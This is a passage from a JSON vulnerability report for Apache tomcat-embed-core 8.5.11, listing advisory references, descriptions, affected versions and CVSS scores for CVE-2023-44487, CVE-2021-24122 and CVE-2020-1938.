List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK"},{"summary":"Fedora Project Mailing 
List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WE2I52RHNNU42PX6NZ2RBUHSFFJ2LVZX"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3N4NJ7FR4X4FPZUGNTQAPSTVB2HB2Y4A"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BFQD3KUEMFBHPAPBGLWQC34L4OWL5HAZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CLB4TW7KALB3EEQWNWCN7OUIWWVWWCG2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E72T67UPDRXHIDLO3OROR25YAMN4GGW5"},{"summary":"Fedora Project Mailing 
List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FNA62Q767CFAFHBCDKYNPBMZWB7TWYVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HT7T2R4MQKLIF4ODV4BDLPARWFPCJ5CZ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JIZSEFC3YKCGABA2BZW6ZJRMDZJMB7PJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JMEXY22BFG5Q64HQCM5CK2Q7KDKVV4TY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSEGD2IWKNUO3DWY4KQGUQM5BISRWHQE"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKYHSZQFDNR7RSA7LHVLLIAQMVYCUGBG"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LNMZJCDHGLJJLXO4OXWJMTVQRNWOC7UL"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VHUHTSXLXGXS7JYKBXTA3VINUPHTNGVU"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VSRDIV77HNKUSM7SJC5BKE5JSHLHU2NK"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WLPRQ5TWUQQXYWBJM7ECYDAIL2YVKIUH"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/X6QXN4ORIVF6XBW4WWFE7VNPVC74S45Y"},{"summary":"Fedora Project Mailing 
List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XFOIBB4YFICHDM7IBOP7PWXW3FX4HLL2"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZB43REMKRQR62NJEI7I5NQ4FSXNLBKRT"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKQSIKIAT5TJ3WSLU3RDBQ35YX4GY4V3"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZLU6U2R2IC2K64NDPNMV55AUAO65MAF4"},{"summary":"W3 Mailing List","url":"https://lists.w3.org/Archives/Public/ietf-http-wg/2023OctDec/0025.html"},{"summary":"Nginx Mailing List","url":"https://mailman.nginx.org/pipermail/nginx-devel/2023-October/S36Q5HBXR7CAIMPLLPRSSSYR4PCMWILK.html"},{"summary":"Microsoft Advisory 2","url":"https://msrc.microsoft.com/blog/2023/10/microsoft-response-to-distributed-denial-of-service-ddos-attacks-against-http/2"},{"summary":"CVE Record","url":"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-44487"},{"summary":"F5 Advisory K000137106","url":"https://my.f5.com/manage/s/article/K000137106"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44487"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-44487"},{"summary":"Openssf Advisory http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response","url":"https://openssf.org/blog/2023/10/10/http-2-rapid-reset-vulnerability-highlights-need-for-rapid-response"},{"summary":"Seanmonstar Advisory hyper-http2-rapid-reset-unaffected","url":"https://seanmonstar.com/post/730794151136935936/hyper-http2-rapid-reset-unaffected"},{"summary":"Gentoo Advisory glsa-202311-09","url":"https://security.gentoo.org/glsa/202311-09"},{"summary":"NetApp Advisory 
ntap-20231016-0001","url":"https://security.netapp.com/advisory/ntap-20231016-0001"},{"summary":"NetApp Advisory ntap-20240426-0007","url":"https://security.netapp.com/advisory/ntap-20240426-0007"},{"summary":"NetApp Advisory ntap-20240621-0006","url":"https://security.netapp.com/advisory/ntap-20240621-0006"},{"summary":"NetApp Advisory ntap-20240621-0007","url":"https://security.netapp.com/advisory/ntap-20240621-0007"},{"summary":"Cve 2023","url":"https://security.paloaltonetworks.com/CVE-2023-44487"},{"summary":"CVE Record","url":"https://ubuntu.com/security/CVE-2023-44487"},{"summary":"Bleepingcomputer Advisory new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records","url":"https://www.bleepingcomputer.com/news/security/new-http-2-rapid-reset-zero-day-attack-breaks-ddos-records"},{"summary":"Cve 2023","url":"https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487"},{"summary":"Darkreading Advisory internet-wide-zero-day-bug-fuels-largest-ever-ddos-event","url":"https://www.darkreading.com/cloud/internet-wide-zero-day-bug-fuels-largest-ever-ddos-event"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"},{"summary":"Debian Advisory dsa-5540","url":"https://www.debian.org/security/2023/dsa-5540"},{"summary":"Debian Advisory dsa-5549","url":"https://www.debian.org/security/2023/dsa-5549"},{"summary":"Debian Advisory dsa-5558","url":"https://www.debian.org/security/2023/dsa-5558"},{"summary":"Debian Advisory dsa-5570","url":"https://www.debian.org/security/2023/dsa-5570"},{"summary":"Eclipse Advisory msg00181","url":"https://www.eclipse.org/lists/jetty-announce/msg00181.html"},{"summary":"Haproxy Advisory 
haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487","url":"https://www.haproxy.com/blog/haproxy-is-not-affected-by-the-http-2-rapid-reset-attack-cve-2023-44487"},{"summary":"Netlify Advisory netlify-successfully-mitigates-cve-2023-44487","url":"https://www.netlify.com/blog/netlify-successfully-mitigates-cve-2023-44487"},{"summary":"Nginx Advisory http-2-rapid-reset-attack-impacting-f5-nginx-products","url":"https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products"},{"summary":"Openwall Mailing List","url":"https://www.openwall.com/lists/oss-security/2023/10/10/6"},{"summary":"Phoronix Advisory HTTP2-Rapid-Reset-Attack","url":"https://www.phoronix.com/news/HTTP2-Rapid-Reset-Attack"},{"summary":"Theregister Advisory http2_rapid_reset_zeroday","url":"https://www.theregister.com/2023/10/10/http2_rapid_reset_zeroday"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"LOW","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"LOW","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-44487/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-24122"]}],"cve":"CVE-2021-24122","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized 
Actor"},"discovery_date":"2021-05-13T22:30:02","ids":[{"system_name":"CVE Record","text":"CVE-2021-24122"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"NetApp Advisory","text":"ntap-20210212-0008"}],"notes":[{"audience":"developers","category":"other","text":"Use of Incorrectly-Resolved Name or Reference","title":"Additional CWE: 706"},{"category":"description","details":"Vulnerability Description","text":"Information Disclosure in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Information Disclosure in Apache Tomcat When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances. 
## Related CVE(s) BIT-tomcat-2021-24122, CVE-2021-24122"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.60"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.60"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/01/14/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1595889b083e05986f42b944dc43060d6b083022260b6ea64d2cec52@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7382e1e35b9bc7c8f320b90ad77e74c13172d08034e20c18000fe710@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r776c64337495bf28b7d5597268114a888e3fad6045c40a0da0c66d4d@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e0bb9ea415724550e2b325e143b23e269579e54d66fcd7754bd0c20@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb32a73b7cb919d4f44a2596b6b951274c0004fc8b0e393d6829a45f9@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rca833c6d42b7b9ce1563488c0929f29fcc95947d86e5e740258c8937@%3Cdev.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-24122"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-24122"},{"summary":"NetApp Advisory 
ntap-20210212-0008","url":"https://security.netapp.com/advisory/ntap-20210212-0008"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.9,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":5.9,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.9,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.60"]}],"title":"CVE-2021-24122/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1938"]}],"cve":"CVE-2020-1938","cwe":{"id":"269","name":"Improper Privilege Management"},"discovery_date":"2020-06-15T18:51:21","ids":[{"system_name":"CVE Record","text":"CVE-2020-1938"},{"system_name":"Blackberry Advisory","text":"articleDetail"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Debian Advisory","text":"dsa-4673"},{"system_name":"Debian Advisory","text":"dsa-4680"},{"system_name":"Gentoo Advisory","text":"glsa-202003-43"},{"system_name":"NetApp Advisory","text":"ntap-20200226-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Privilege Management in Tomcat"},{"category":"details","details":"Vulnerability 
Details","text":"# Improper Privilege Management in Tomcat When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: returning arbitrary files from anywhere in the web application, processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. 
## Related CVE(s) BIT-tomcat-2020-1938, CVE-2020-1938"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.51"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html"},{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html"},{"summary":"Blackberry Advisory articleDetail","url":"http://support.blackberry.com/kb/articleDetail?articleNumber=000062739"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7%40%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61f280a76902b594692f0b24a1dbf647bb5a4c197b9395e9a6796e7c@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a5633cad1b560a1e51f5b425f02918bdf30e090fdf18c5f7c2617eb@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r74328b178f9f37fe759dffbc9c1f2793e66d79d7a8a20d3836551794@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r75113652e46c4dee687236510649acfb70d2c63e074152049c3f399d@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r772335e6851ad33ddb076218fa4ff70de1bf398d5b43e2ddf0130e5d@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r856cdd87eda7af40b50278d6de80ee4b42d63adeb433a34a7bdaf9db@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8f7484589454638af527182ae55ef5b628ba00c05c5b11887c922fb1@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922%40%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90890afea72a9571d666820b2fe5942a0a5f86be406fa31da3dd0922@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a%40%3Cusers.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r92d78655c068d0bc991d1edbdfb24f9c5134603e647cade1113d4e0a@%3Cusers.tomee.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed%40%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9%40%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing 
List","url":"https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2%40%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194%40%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425%40%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425@%3Cnotifications.ofbiz.apache.org%3E"},{"summary":"Apache Mailing 